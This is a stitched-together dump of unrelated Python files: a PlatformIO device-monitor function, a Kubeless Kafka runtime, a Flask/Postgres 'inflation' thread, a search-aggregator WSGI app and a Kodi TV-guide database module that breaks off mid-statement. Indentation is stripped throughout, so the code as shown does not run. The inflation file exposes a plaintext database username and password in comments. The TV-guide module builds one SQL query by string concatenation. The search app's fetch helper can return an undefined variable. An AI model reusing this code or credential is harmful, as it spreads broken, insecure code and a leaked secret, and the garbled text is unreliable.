def device_monitor(ctx, agents, **kwargs):
from platformio.commands.remote.client.device_monitor import DeviceMonitorClient
if kwargs["sock"]:
return DeviceMonitorClient(agents, **kwargs).connect()
project_options = {}
try:
with fs.cd(kwargs["project_dir"]):
project_options = device_helpers.get_project_options(kwargs["environment"])
kwargs = device_helpers.apply_project_monitor_options(kwargs, project_options)
except NotPlatformIOProjectError:
pass
kwargs["baud"] = kwargs["baud"] or 9600
def _tx_target(sock_dir):
subcmd_argv = ["remote", "device", "monitor"]
subcmd_argv.extend(device_helpers.options_to_argv(kwargs, project_options))
subcmd_argv.extend(["--sock", sock_dir])
subprocess.call([proc.where_is_program("platformio")] + subcmd_argv)
sock_dir = mkdtemp(suffix="pio")
sock_file = os.path.join(sock_dir, "sock")
try:
t = threading.Thread(target=_tx_target, args=(sock_dir,))
t.start()
while t.is_alive() and not os.path.isfile(sock_file):
sleep(0.1)
if not t.is_alive():
return
with open(sock_file, encoding="utf8") as fp:
kwargs["port"] = fp.read()
ctx.invoke(cmd_device_monitor, **kwargs)
t.join(2)
finally:
fs.rmtree(sock_dir)
return True
|
kubeless.py | #!/usr/bin/env python
import sys
import traceback
import os
import imp
import json
from multiprocessing import Process, Queue
from kafka import KafkaConsumer
import prometheus_client as prom
mod_name = os.getenv('MOD_NAME')
func_handler = os.getenv('FUNC_HANDLER')
topic_name = os.getenv('TOPIC_NAME')
timeout = float(os.getenv('FUNC_TIMEOUT', 180))
group = mod_name + func_handler
if "KUBELESS_KAFKA_SVC" in os.environ:
kafka_svc = os.getenv('KUBELESS_KAFKA_SVC')
else:
kafka_svc = 'kafka'
if "KUBELESS_KAFKA_NAMESPACE" in os.environ:
kafka_namespace = os.getenv('KUBELESS_KAFKA_NAMESPACE')
else:
kafka_namespace = 'kubeless'
kafka_server = '%s.%s:9092' % (kafka_svc, kafka_namespace)
mod = imp.load_source('function', '/kubeless/%s.py' % mod_name)
func = getattr(mod, func_handler)
func_hist = prom.Histogram('function_duration_seconds',
'Duration of user function in seconds',
['topic'])
func_calls = prom.Counter('function_calls_total',
'Number of calls to user function',
['topic'])
func_errors = prom.Counter('function_failures_total',
'Number of exceptions in user function',
['topic'])
def funcWrap(q, payload):
q.put(func(payload))
def json_safe_loads(msg):
try:
data = json.loads(msg)
return {'type': 'json', 'payload': data}
except:
return {'type': 'text', 'payload': msg}
consumer = KafkaConsumer(
bootstrap_servers=kafka_server,
group_id=group, value_deserializer=json_safe_loads)
consumer.subscribe([topic_name])
def handle(msg):
func_calls.labels(topic_name).inc()
with func_errors.labels(topic_name).count_exceptions():
with func_hist.labels(topic_name).time():
q = Queue()
p = Process(target=funcWrap, args=(q,msg.value['payload'],))
p.start()
p.join(timeout)
# If thread is still active
if p.is_alive():
p.terminate()
p.join()
raise Exception('Timeout while processing the function')
else:
return q.get()
if __name__ == '__main__':
prom.start_http_server(8080)
while True:
for msg in consumer:
try:
res = handle(msg)
sys.stdout.write(str(res) + '\n')
sys.stdout.flush()
except Exception:
traceback.print_exc()
|
inflation.py | from flask_restful import abort, reqparse, Resource
from marshmallow import Schema, fields, ValidationError, pre_load
from flask import Flask, Blueprint, request, jsonify
from flask_cors import CORS, cross_origin
import psycopg2
import os
from os.path import join, dirname
import threading
from time import sleep
import math
import urlparse
# DB_DRIVER=postgresql
# DB_HOST=localhost
# DB_USER=patientplatypus
# DB_PASSWORD=Fvnjty0b
# DB_NAME=pictureswapper
class Inflate:
threads = []
def __init__(self, s):
self.s = s
def printtest(self):
print('insided the printtest for inflation')
def inflatemethod(self):
while 1 > 0:
# conn = psycopg2.connect(database = os.environ.get('DB_NAME'), user = os.environ.get('DB_USER'), password = os.environ.get('DB_PASSWORD'))
urlparse.uses_netloc.append("postgres")
url = urlparse.urlparse(os.environ["DATABASE_URL"])
conn = psycopg2.connect(
database=url.path[1:],
user=url.username,
password=url.password,
host=url.hostname,
port=url.port
)
# conn = psycopg2.connect(database = 'pictureswapper', user = 'patientplatypus', password = 'Fvnjty0b')
cur = conn.cursor()
sql = 'SELECT * FROM logins'
cur.execute(sql)
conn.commit()
userdata = cur.fetchall()
userdataclean = userdata[0]
print('this is the value of userdataclean ', userdataclean)
print('this is the value of userdata ', userdata)
usermoney = []
totalmoney = 0
for x in range(0,len(userdata)):
userdict = {}
userdict['name'] = userdata[x][0]
userdict['money'] = userdata[x][2]
usermoney.append(userdict)
sortedusers = sorted(usermoney, key=lambda k: k['money'])
print('sortedusers before adding: ', sortedusers)
for x in range(0, len(sortedusers)):
if 100 * x / len(sortedusers) <= 20 and sortedusers[x]['money']<sortedusers[int(math.ceil(0.2*len(sortedusers)))]['money']:
sortedusers[x]['money'] = sortedusers[x]['money'] + 1
print('sortedusers after adding: ', sortedusers)
# now send to daterbase
for x in range(0, len(sortedusers)):
sql = 'UPDATE logins SET totalmoney = %s WHERE username = %s'
params = (sortedusers[x]['money'], sortedusers[x]['name'],)
cur.execute(sql, params)
conn.commit()
conn.close()
sleep(300000)
def timermethod(self):
h="hello there "
t = threading.Thread(target=self.inflatemethod, args=())
t.start()
# totalmoney = totalmoney + userdata[x][2]
# for x in range(0, len(usermoney)):
# usermoney[x]['percentage'] = 100 * usermoney[x]['money'] / totalmoney
# print('***** values after first look *****')
# print('usermoney ', usermoney)
# print('totalmoney ', totalmoney)
#
# for x in range(0, len(usermoney)):
# if usermoney[x]['percentage'] <= 20:
# sql = 'UPDATE logins SET totalmoney = %s WHERE username = %s'
# newtotalmoney = usermoney[x]['money']+10
# params = (newtotalmoney, usermoney[x]['name'],)
# cur.execute(sql, params)
# conn.commit()
#
# sleep(5)
#
# sql = 'SELECT * FROM logins'
# cur.execute(sql)
# conn.commit()
# userdatanew = cur.fetchall()
# usermoneynew = []
# totalmoneynew = 0
# for x in range(0,len(userdatanew)):
# userdict = {}
# userdict['name'] = userdatanew[x][0]
# userdict['money'] = userdatanew[x][2]
# usermoneynew.append(userdict)
# totalmoneynew = totalmoneynew + userdatanew[x][2]
# for x in range(0, len(usermoneynew)):
# usermoneynew[x]['percentage'] = 100 * usermoneynew[x]['money'] / totalmoney
#
#
# print('***** values after add money *****')
# print('usermoneynew ', usermoneynew)
# print('totalmoneynew ', totalmoneynew)
#
# print('***** the total number of users *****')
# print('total number of users: ', len(userdata))
#
# conn.close()
#
# alist = [54,26,93,17,77,31,44,55,20]
# bubbleSort(alist)
# print(alist)
#
# class Inflate:
# # def __init__(self, profitorloss, listname, itemname, itemdescription):
# # self.profitorloss = profitorloss
# # self.listname = listname
# # self.itemname = itemname
# # self.itemdescription = itemdescription
# threads = []
# def __init__(self, s):
# self.s = s
# def printtest(self):
# print('insided the printtest for inflation')
# def hello(self, h):
# print h + self.s
# def timermethod(self):
# h="hello there "
# for i in range(5):
# t = threading.Thread(target=self.hello, args=(h,))
# t.start()
# sleep(2)
# while 1>0:
# t = threading.Timer(2, self.hello, [h])
# t.start()
# sleep(2)
# time.sleep(2)
# print "Hi"
# i=10
# i=i+20
# print i
# class Typewriter(threading.Thread):
# def __init__(self, your_string):
# threading.Thread.__init__(self)
# self.my_string = your_string
#
# def run(self):
# for char in self.my_string:
# libtcod.console_print(0,3,3,char)
# time.sleep(50)
# import threading
#
# def worker():
# """thread worker function"""
# print 'Worker'
# return
#
# threads = []
# for i in range(5):
# t = threading.Thread(target=worker)
# threads.append(t)
# t.start()
#!/usr/bin/python
#
# import threading
# import time
#
# exitFlag = 0
#
# class myThread (threading.Thread):
# def __init__(self, threadID, name, counter):
# threading.Thread.__init__(self)
# self.threadID = threadID
# self.name = name
# self.counter = counter
# def run(self):
# print "Starting " + self.name
# print_time(self.name, self.counter, 5)
# print "Exiting " + self.name
#
# def print_time(threadName, counter, delay):
# while counter:
# if exitFlag:
# threadName.exit()
# time.sleep(delay)
# print "%s: %s" % (threadName, time.ctime(time.time()))
# counter -= 1
#
# # Create new threads
# thread1 = myThread(1, "Thread-1", 1)
# thread2 = myThread(2, "Thread-2", 2)
#
# # Start new Threads
# thread1.start()
# thread2.start()
#
# print "Exiting Main Thread"
# class Dog:
#
# def __init__(self, name):
# self.name = name
# self.tricks = [] # creates a new empty list for each dog
#
# def add_trick(self, trick):
# self.tricks.append(trick)
|
index.wsgi | # -*- coding: UTF-8 -*-
import sae,sys
reload(sys)
sys.setdefaultencoding('utf8')
import urllib,urllib2,cookielib
import HTMLParser,json
#from multiprocessing.pool import Pool
import threading,time
from greenlet import greenlet
import getSearchResult as gsr
import publicParams as P
import reHTMLTags as rH
def app(environ, start_response):
key=environ['QUERY_STRING']
if key.count("&"):
key=key.split("&")[0]
if key:
P.key=urllib.unquote(key)
for surl in P.searchURLarr:
t = threading.Thread(target=getURL,args=(surl,key))
t.start()
#g=greenlet(getURL)
#g.switch(surl,key)
#getURL(surl,key)
jsarr=json.loads(json.dumps(P.list_data, indent=2))
jsarr.sort(key = lambda x:x["weight"],reverse=True)
response_body=json.dumps(jsarr, indent=2)
#response_body=json.dumps(P.list_time, indent=2)
else:
response_body=[]
status = '200 OK'
response_headers = [
('Content-Type', 'application/json'),
('Access-Control-Allow-Origin', '*')
#('Content-Type', 'text/plain')
]
start_response(status, response_headers)
return response_body
application = sae.create_wsgi_app(app)
def getURL(surl,key):
u=surl
u+=key
mu=u.split('/')[0]+'/'+u.split('/')[1]+'/'+u.split('/')[2]
#P.list_time.append("1"+str(time.ctime()))
h=gethtml(u)
#P.list_time.append("2"+str(time.ctime()))
#pool_getlinks=getlinks(h,mu)
#getlinks(h,mu)
#with Pool(8) as p:
# p.map_async(pool_getlinks,RAW_DATASET,1)
#t = threading.Thread(target=getlinks,args=(h,mu))
#t.start()
g=greenlet(getlinks)
g.switch(h,mu)
#P.list_time.append("3"+str(time.ctime()))
def getlinks(html_code,addr):
hp = gsr.getSearchResult(addr)
hp.feed(html_code)
hp.close()
def gethtml(url):
cookie = cookielib.CookieJar()
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cookie))
req = urllib2.Request(url)
try:
content = opener.open(req).read() #获取页面内容
except urllib2.URLError,e:
pass
return content
|
source.py | # -*- coding: utf-8 -*-
#
# Copyright (C) 2013 Tommy Winther
# http://tommy.winther.nu
#
# Modified for FTV Guide (09/2014 onwards)
# by Thomas Geppert [bluezed] - bluezed.apps@gmail.com
#
# This Program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2, or (at your option)
# any later version.
#
# This Program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this Program; see the file LICENSE.txt. If not, write to
# the Free Software Foundation, 675 Mass Ave, Cambridge, MA 02139, USA.
# http://www.gnu.org/copyleft/gpl.html
#
import os
import threading
import datetime
import time
from xml.etree import ElementTree
from strings import *
from guideTypes import *
from fileFetcher import *
import xbmc
import xbmcgui
import xbmcvfs
import sqlite3
SETTINGS_TO_CHECK = ['source', 'xmltv.type', 'xmltv.file', 'xmltv.url', 'xmltv.logo.folder']
class Channel(object):
def __init__(self, id, title, logo=None, streamUrl=None, visible=True, weight=-1):
self.id = id
self.title = title
self.logo = logo
self.streamUrl = streamUrl
self.visible = visible
self.weight = weight
def isPlayable(self):
return hasattr(self, 'streamUrl') and self.streamUrl
def __eq__(self, other):
return self.id == other.id
def __repr__(self):
return 'Channel(id=%s, title=%s, logo=%s, streamUrl=%s)' \
% (self.id, self.title, self.logo, self.streamUrl)
class Program(object):
def __init__(self, channel, title, startDate, endDate, description, imageLarge=None, imageSmall=None,
notificationScheduled=None):
"""
@param channel:
@type channel: source.Channel
@param title:
@param startDate:
@param endDate:
@param description:
@param imageLarge:
@param imageSmall:
"""
self.channel = channel
self.title = title
self.startDate = startDate
self.endDate = endDate
self.description = description
self.imageLarge = imageLarge
self.imageSmall = imageSmall
self.notificationScheduled = notificationScheduled
def __repr__(self):
return 'Program(channel=%s, title=%s, startDate=%s, endDate=%s, description=%s, imageLarge=%s, imageSmall=%s)' % \
(self.channel, self.title, self.startDate, self.endDate, self.description, self.imageLarge,
self.imageSmall)
class SourceException(Exception):
pass
class SourceUpdateCanceledException(SourceException):
pass
class SourceNotConfiguredException(SourceException):
pass
class DatabaseSchemaException(sqlite3.DatabaseError):
pass
class Database(object):
SOURCE_DB = 'source.db'
CHANNELS_PER_PAGE = 8
def __init__(self):
self.conn = None
self.eventQueue = list()
self.event = threading.Event()
self.eventResults = dict()
self.source = instantiateSource()
self.updateInProgress = False
self.updateFailed = False
self.settingsChanged = None
self.alreadyTriedUnlinking = False
self.channelList = list()
profilePath = xbmc.translatePath(ADDON.getAddonInfo('profile'))
if not os.path.exists(profilePath):
os.makedirs(profilePath)
self.databasePath = os.path.join(profilePath, Database.SOURCE_DB)
threading.Thread(name='Database Event Loop', target=self.eventLoop).start()
def eventLoop(self):
print 'Database.eventLoop() >>>>>>>>>> starting...'
while True:
self.event.wait()
self.event.clear()
event = self.eventQueue.pop(0)
command = event[0]
callback = event[1]
print 'Database.eventLoop() >>>>>>>>>> processing command: ' + command.__name__
try:
result = command(*event[2:])
self.eventResults[command.__name__] = result
if callback:
if self._initialize == command:
threading.Thread(name='Database callback', target=callback, args=[result]).start()
else:
threading.Thread(name='Database callback', target=callback).start()
if self._close == command:
del self.eventQueue[:]
break
except Exception:
print 'Database.eventLoop() >>>>>>>>>> exception!'
print 'Database.eventLoop() >>>>>>>>>> exiting...'
def _invokeAndBlockForResult(self, method, *args):
event = [method, None]
event.extend(args)
self.eventQueue.append(event)
self.event.set()
while not method.__name__ in self.eventResults:
time.sleep(0.1)
result = self.eventResults.get(method.__name__)
del self.eventResults[method.__name__]
return result
def initialize(self, callback, cancel_requested_callback=None):
self.eventQueue.append([self._initialize, callback, cancel_requested_callback])
self.event.set()
def _initialize(self, cancel_requested_callback):
sqlite3.register_adapter(datetime.datetime, self.adapt_datetime)
sqlite3.register_converter('timestamp', self.convert_datetime)
self.alreadyTriedUnlinking = False
while True:
if cancel_requested_callback is not None and cancel_requested_callback():
break
try:
self.conn = sqlite3.connect(self.databasePath, detect_types=sqlite3.PARSE_DECLTYPES)
self.conn.execute('PRAGMA foreign_keys = ON')
self.conn.row_factory = sqlite3.Row
# create and drop dummy table to check if database is locked
c = self.conn.cursor()
c.execute('CREATE TABLE IF NOT EXISTS database_lock_check(id TEXT PRIMARY KEY)')
c.execute('DROP TABLE database_lock_check')
c.close()
self._createTables()
self.settingsChanged = self._wasSettingsChanged(ADDON)
break
except sqlite3.OperationalError:
if cancel_requested_callback is None:
xbmc.log('[script.ftvguide] Database is locked, bailing out...', xbmc.LOGDEBUG)
break
else: # ignore 'database is locked'
xbmc.log('[script.ftvguide] Database is locked, retrying...', xbmc.LOGDEBUG)
except sqlite3.DatabaseError:
self.conn = None
if self.alreadyTriedUnlinking:
xbmc.log('[script.ftvguide] Database is broken and unlink() failed', xbmc.LOGDEBUG)
break
else:
try:
os.unlink(self.databasePath)
except OSError:
pass
self.alreadyTriedUnlinking = True
xbmcgui.Dialog().ok(ADDON.getAddonInfo('name'), strings(DATABASE_SCHEMA_ERROR_1),
strings(DATABASE_SCHEMA_ERROR_2), strings(DATABASE_SCHEMA_ERROR_3))
return self.conn is not None
def close(self, callback=None):
self.eventQueue.append([self._close, callback])
self.event.set()
def _close(self):
try:
# rollback any non-commit'ed changes to avoid database lock
if self.conn:
self.conn.rollback()
except sqlite3.OperationalError:
pass # no transaction is active
if self.conn:
self.conn.close()
def _wasSettingsChanged(self, addon):
settingsChanged = False
noRows = True
count = 0
c = self.conn.cursor()
c.execute('SELECT * FROM settings')
for row in c:
noRows = False
key = row['key']
if SETTINGS_TO_CHECK.count(key):
count += 1
if row['value'] != addon.getSetting(key):
settingsChanged = True
if count != len(SETTINGS_TO_CHECK):
settingsChanged = True
if settingsChanged or noRows:
for key in SETTINGS_TO_CHECK:
value = addon.getSetting(key).decode('utf-8', 'ignore')
c.execute('INSERT OR IGNORE INTO settings(key, value) VALUES (?, ?)', [key, value])
if not c.rowcount:
c.execute('UPDATE settings SET value=? WHERE key=?', [value, key])
self.conn.commit()
c.close()
print 'Settings changed: ' + str(settingsChanged)
return settingsChanged
def _isCacheExpired(self, date):
if self.settingsChanged:
return True
# check if channel data is up-to-date in database
try:
c = self.conn.cursor()
c.execute('SELECT channels_updated FROM sources WHERE id=?', [self.source.KEY])
row = c.fetchone()
if not row:
return True
channelsLastUpdated = row['channels_updated']
c.close()
except TypeError:
return True
# check if program data is up-to-date in database
dateStr = date.strftime('%Y-%m-%d')
c = self.conn.cursor()
c.execute('SELECT programs_updated FROM updates WHERE source=? AND date=?', [self.source.KEY, dateStr])
row = c.fetchone()
if row:
programsLastUpdated = row['programs_updated']
else:
programsLastUpdated = datetime.datetime.fromtimestamp(0)
c.close()
return self.source.isUpdated(channelsLastUpdated, programsLastUpdated)
def updateChannelAndProgramListCaches(self, callback, date=datetime.datetime.now(), progress_callback=None,
clearExistingProgramList=True):
self.eventQueue.append(
[self._updateChannelAndProgramListCaches, callback, date, progress_callback, clearExistingProgramList])
self.event.set()
def _updateChannelAndProgramListCaches(self, date, progress_callback, clearExistingProgramList):
# todo workaround service.py 'forgets' the adapter and convert set in _initialize.. wtf?!
sqlite3.register_adapter(datetime.datetime, self.adapt_datetime)
sqlite3.register_converter('timestamp', self.convert_datetime)
if not self._isCacheExpired(date) and not self.source.needReset:
return
else:
# if the xmltv data needs to be loaded the database
# should be reset to avoid ghosting!
self.updateInProgress = True
c = self.conn.cursor()
c.execute("DELETE FROM updates")
c.execute("UPDATE sources SET channels_updated=0")
self.conn.commit()
c.close()
self.source.needReset = False
self.updateInProgress = True
self.updateFailed = False
dateStr = date.strftime('%Y-%m-%d')
c = self.conn.cursor()
try:
xbmc.log('[script.ftvguide] Updating caches...', xbmc.LOGDEBUG)
if progress_callback:
progress_callback(0)
if self.settingsChanged:
c.execute('DELETE FROM channels WHERE source=?', [self.source.KEY])
c.execute('DELETE FROM programs WHERE source=?', [self.source.KEY])
c.execute("DELETE FROM updates WHERE source=?", [self.source.KEY])
self.settingsChanged = False # only want to update once due to changed settings
if clearExistingProgramList:
c.execute("DELETE FROM updates WHERE source=?",
[self.source.KEY]) # cascades and deletes associated programs records
else:
c.execute("DELETE FROM updates WHERE source=? AND date=?",
[self.source.KEY, dateStr]) # cascades and deletes associated programs records
# programs updated
c.execute("INSERT INTO updates(source, date, programs_updated) VALUES(?, ?, ?)",
[self.source.KEY, dateStr, datetime.datetime.now()])
updatesId = c.lastrowid
imported = imported_channels = imported_programs = 0
for item in self.source.getDataFromExternal(date, progress_callback):
imported += 1
if imported % 10000 == 0:
self.conn.commit()
if isinstance(item, Channel):
imported_channels += 1
channel = item
c.execute(
'INSERT OR IGNORE INTO channels(id, title, logo, stream_url, visible, weight, source) VALUES(?, ?, ?, ?, ?, (CASE ? WHEN -1 THEN (SELECT COALESCE(MAX(weight)+1, 0) FROM channels WHERE source=?) ELSE ? END), ?)',
[channel.id, channel.title, channel.logo, channel.streamUrl, channel.visible, channel.weight,
self.source.KEY, channel.weight, self.source.KEY])
if not c.rowcount:
c.execute(
'UPDATE channels SET title=?, logo=?, stream_url=?, visible=(CASE ? WHEN -1 THEN visible ELSE ? END), weight=(CASE ? WHEN -1 THEN weight ELSE ? END) WHERE id=? AND source=?',
[channel.title, channel.logo, channel.streamUrl, channel.weight, channel.visible,
channel.weight, channel.weight, channel.id, self.source.KEY])
elif isinstance(item, Program):
imported_programs += 1
program = item
if isinstance(program.channel, Channel):
channel = program.channel.id
else:
channel = program.channel
c.execute(
'INSERT INTO programs(channel, title, start_date, end_date, description, image_large, image_small, source, updates_id) VALUES(?, ?, ?, ?, ?, ?, ?, ?, ?)',
[channel, program.title, program.startDate, program.endDate, program.description,
program.imageLarge, program.imageSmall, self.source.KEY, updatesId])
# channels updated
c.execute("UPDATE sources SET channels_updated=? WHERE id=?", [datetime.datetime.now(), self.source.KEY])
self.conn.commit()
if imported_channels == 0 or imported_programs == 0:
self.updateFailed = True
except SourceUpdateCanceledException:
# force source update on next load
c.execute('UPDATE sources SET channels_updated=? WHERE id=?', [0, self.source.KEY])
c.execute("DELETE FROM updates WHERE source=?",
[self.source.KEY]) # cascades and deletes associated programs records
self.conn.commit()
except Exception:
import traceback as tb
import sys
(etype, value, traceback) = sys.exc_info()
tb.print_exception(etype, value, traceback)
try:
self.conn.rollback()
except sqlite3.OperationalError:
pass # no transaction is active
try:
# invalidate cached data
c.execute('UPDATE sources SET channels_updated=? WHERE id=?', [0, self.source.KEY])
self.conn.commit()
except sqlite3.OperationalError:
pass # database is locked
self.updateFailed = True
finally:
self.updateInProgress = False
c.close()
def getEPGView(self, channelStart, date=datetime.datetime.now(), progress_callback=None,
clearExistingProgramList=True):
result = self._invokeAndBlockForResult(self._getEPGView, channelStart, date, progress_callback,
clearExistingProgramList)
if self.updateFailed:
raise SourceException('No channels or programs imported')
return result
def _getEPGView(self, channelStart, date, progress_callback, clearExistingProgramList):
self._updateChannelAndProgramListCaches(date, progress_callback, clearExistingProgramList)
channels = self._getChannelList(onlyVisible=True)
if channelStart < 0:
channelStart = len(channels) - 1
elif channelStart > len(channels) - 1:
channelStart = 0
channelEnd = channelStart + Database.CHANNELS_PER_PAGE
channelsOnPage = channels[channelStart: channelEnd]
programs = self._getProgramList(channelsOnPage, date)
return [channelStart, channelsOnPage, programs]
def getNextChannel(self, currentChannel):
channels = self.getChannelList()
idx = channels.index(currentChannel)
idx += 1
if idx > len(channels) - 1:
idx = 0
return channels[idx]
def getPreviousChannel(self, currentChannel):
channels = self.getChannelList()
idx = channels.index(currentChannel)
idx -= 1
if idx < 0:
idx = len(channels) - 1
return channels[idx]
def saveChannelList(self, callback, channelList):
self.eventQueue.append([self._saveChannelList, callback, channelList])
self.event.set()
def _saveChannelList(self, channelList):
c = self.conn.cursor()
for idx, channel in enumerate(channelList):
c.execute(
'INSERT OR IGNORE INTO channels(id, title, logo, stream_url, visible, weight, source) VALUES(?, ?, ?, ?, ?, (CASE ? WHEN -1 THEN (SELECT COALESCE(MAX(weight)+1, 0) FROM channels WHERE source=?) ELSE ? END), ?)',
[channel.id, channel.title, channel.logo, channel.streamUrl, channel.visible, channel.weight,
self.source.KEY, channel.weight, self.source.KEY])
if not c.rowcount:
c.execute(
'UPDATE channels SET title=?, logo=?, stream_url=?, visible=?, weight=(CASE ? WHEN -1 THEN weight ELSE ? END) WHERE id=? AND source=?',
[channel.title, channel.logo, channel.streamUrl, channel.visible, channel.weight, channel.weight,
channel.id, self.source.KEY])
c.execute("UPDATE sources SET channels_updated=? WHERE id=?", [datetime.datetime.now(), self.source.KEY])
self.channelList = None
self.conn.commit()
def getChannelList(self, onlyVisible=True):
if not self.channelList or not onlyVisible:
result = self._invokeAndBlockForResult(self._getChannelList, onlyVisible)
if not onlyVisible:
return result
self.channelList = result
return self.channelList
def _getChannelList(self, onlyVisible):
c = self.conn.cursor()
channelList = list()
if onlyVisible:
c.execute('SELECT * FROM channels WHERE source=? AND visible=? ORDER BY weight', [self.source.KEY, True])
else:
c.execute('SELECT * FROM channels WHERE source=? ORDER BY weight', [self.source.KEY])
for row in c:
channel = Channel(row['id'], row['title'], row['logo'], row['stream_url'], row['visible'], row['weight'])
channelList.append(channel)
c.close()
return channelList
def getCurrentProgram(self, channel):
return self._invokeAndBlockForResult(self._getCurrentProgram, channel)
def _getCurrentProgram(self, channel):
"""
@param channel:
@type channel: source.Channel
@return:
"""
program = None
now = datetime.datetime.now()
c = self.conn.cursor()
c.execute('SELECT * FROM programs WHERE channel=? AND source=? AND start_date <= ? AND end_date >= ?',
[channel.id, self.source.KEY, now, now])
row = c.fetchone()
if row:
program = Program(channel, row['title'], row['start_date'], row['end_date'], row['description'],
row['image_large'], row['image_small'])
c.close()
return program
def getNextProgram(self, channel):
return self._invokeAndBlockForResult(self._getNextProgram, channel)
def _getNextProgram(self, program):
nextProgram = None
c = self.conn.cursor()
c.execute(
'SELECT * FROM programs WHERE channel=? AND source=? AND start_date >= ? ORDER BY start_date ASC LIMIT 1',
[program.channel.id, self.source.KEY, program.endDate])
row = c.fetchone()
if row:
nextProgram = Program(program.channel, row['title'], row['start_date'], row['end_date'], row['description'],
row['image_large'], row['image_small'])
c.close()
return nextProgram
def getPreviousProgram(self, channel):
return self._invokeAndBlockForResult(self._getPreviousProgram, channel)
def _getPreviousProgram(self, program):
previousProgram = None
c = self.conn.cursor()
c.execute(
'SELECT * FROM programs WHERE channel=? AND source=? AND end_date <= ? ORDER BY start_date DESC LIMIT 1',
[program.channel.id, self.source.KEY, program.startDate])
row = c.fetchone()
if row:
previousProgram = Program(program.channel, row['title'], row['start_date'], row['end_date'],
row['description'], row['image_large'], row['image_small'])
c.close()
return previousProgram
def _getProgramList(self, channels, startTime):
"""
@param channels:
@type channels: list of source.Channel
@param startTime:
@type startTime: datetime.datetime
@return:
"""
endTime = startTime + datetime.timedelta(hours=2)
programList = list()
channelMap = dict()
for c in channels:
if c.id:
channelMap[c.id] = c
if not channels:
return []
c = self.conn.cursor()
c.execute(
'SELECT p.*, (SELECT 1 FROM notifications n WHERE n.channel=p.channel AND n.program_title=p.title AND n.source=p.source) AS notification_scheduled FROM programs p WHERE p.channel IN (\'' + (
'\',\''.join(channelMap.keys())) + '\') AND p.source=? AND p.end_date > ? AND p.start_date < ?',
[self.source.KEY, startTime, endTime])
for row in c:
program = Program(channelMap[row['channel']], row['title'], row['start_date'], row['end_date'],
row['description'], row['image_large'], row['image_small'], row['notification_scheduled'])
programList.append(program)
return programList
def _isProgramListCacheExpired(self, date=datetime.datetime.now()):
# check if data is up-to-date in database
dateStr = date.strftime('%Y-%m-%d')
c = self.conn.cursor()
c.execute('SELECT programs_updated FROM updates WHERE source=? AND date=?', [self.source.KEY, dateStr])
row = c.fetchone()
today = datetime.datetime.now()
expired = row is None or row['programs_updated'].day != today.day
c.close()
return expired
def setCustomStreamUrl(self, channel, stream_url):
if stream_url is not None:
self._invokeAndBlockForResult(self._setCustomStreamUrl, channel, stream_url)
# no result, but block until operation is done
def _setCustomStreamUrl(self, channel, stream_url):
if stream_url is not None:
c = self.conn.cursor()
c.execute("DELETE FROM custom_stream_url WHERE channel=?", [channel.id])
c.execute("INSERT INTO custom_stream_url(channel, stream_url) VALUES(?, ?)",
[channel.id, stream_url.decode('utf-8', 'ignore')])
self.conn.commit()
c.close()
def getCustomStreamUrl(self, channel):
return self._invokeAndBlockForResult(self._getCustomStreamUrl, channel)
def _getCustomStreamUrl(self, channel):
c = self.conn.cursor()
c.execute("SELECT stream_url FROM custom_stream_url WHERE channel=?", [channel.id])
stream_url = c.fetchone()
c.close()
if stream_url:
return stream_url[0]
else:
return None
def deleteCustomStreamUrl(self, channel):
self.eventQueue.append([self._deleteCustomStreamUrl, None, channel])
self.event.set()
def _deleteCustomStreamUrl(self, channel):
c = self.conn.cursor()
c.execute("DELETE FROM custom_stream_url WHERE channel=?", [channel.id])
self.conn.commit()
c.close()
def getStreamUrl(self, channel):
customStreamUrl = self.getCustomStreamUrl(channel)
if customStreamUrl:
customStreamUrl = customStreamUrl.encode('utf-8', 'ignore')
return customStreamUrl
elif channel.isPlayable():
streamUrl = channel.streamUrl.encode('utf-8', 'ignore')
return streamUrl
return None
@staticmethod
def adapt_datetime(ts):
# http://docs.python.org/2/library/sqlite3.html#registering-an-adapter-callable
return time.mktime(ts.timetuple())
@staticmethod
def convert_datetime(ts):
try:
return datetime.datetime.fromtimestamp(float(ts))
except ValueError:
return None
def _createTables(self):
c = self.conn.cursor()
try:
c.execute('SELECT major, minor, patch FROM version')
(major, minor, patch) = c.fetchone()
version = [major, minor, patch]
except sqlite3.OperationalError:
version = [0, 0, 0]
try:
if version < [1, 3, 0]:
c.execute('CREATE TABLE IF NOT EXISTS custom_stream_url(channel TEXT, stream_url TEXT)')
c.execute('CREATE TABLE version (major INTEGER, minor INTEGER, patch INTEGER)')
c.execute('INSERT INTO version(major, minor, patch) VALUES(1, 3, 0)')
# For caching data
c.execute('CREATE TABLE sources(id TEXT PRIMARY KEY, channels_updated TIMESTAMP)')
c.execute(
'CREATE TABLE updates(id INTEGER PRIMARY KEY, source TEXT, date TEXT, programs_updated TIMESTAMP)')
c.execute(
'CREATE TABLE channels(id TEXT, title TEXT, logo TEXT, stream_url TEXT, source TEXT, visible BOOLEAN, weight INTEGER, PRIMARY KEY (id, source), FOREIGN KEY(source) REFERENCES sources(id) ON DELETE CASCADE)')
c.execute(
'CREATE TABLE programs(channel TEXT, title TEXT, start_date TIMESTAMP, end_date TIMESTAMP, description TEXT, image_large TEXT, image_small TEXT, source TEXT, updates_id INTEGER, FOREIGN KEY(channel, source) REFERENCES channels(id, source) ON DELETE CASCADE, FOREIGN KEY(updates_id) REFERENCES updates(id) ON DELETE CASCADE)')
c.execute('CREATE INDEX program_list_idx ON programs(source, channel, start_date, end_date)')
c.execute('CREATE INDEX start_date_idx ON programs(start_date)')
c.execute('CREATE INDEX end_date_idx ON programs(end_date)')
# For active setting
c.execute('CREATE TABLE settings(key TEXT PRIMARY KEY, value TEXT)')
# For notifications
c.execute(
"CREATE TABLE notifications(channel TEXT, program_title TEXT, source TEXT, FOREIGN KEY(channel, source) REFERENCES channels(id, source) ON DELETE CASCADE)")
if version < [1, 3, 1]:
# Recreate tables with FOREIGN KEYS as DEFERRABLE INITIALLY DEFERRED
c.execute('UPDATE version SET major=1, minor=3, patch=1')
c.execute('DROP TABLE channels')
c.execute('DROP TABLE programs')
c.execute(
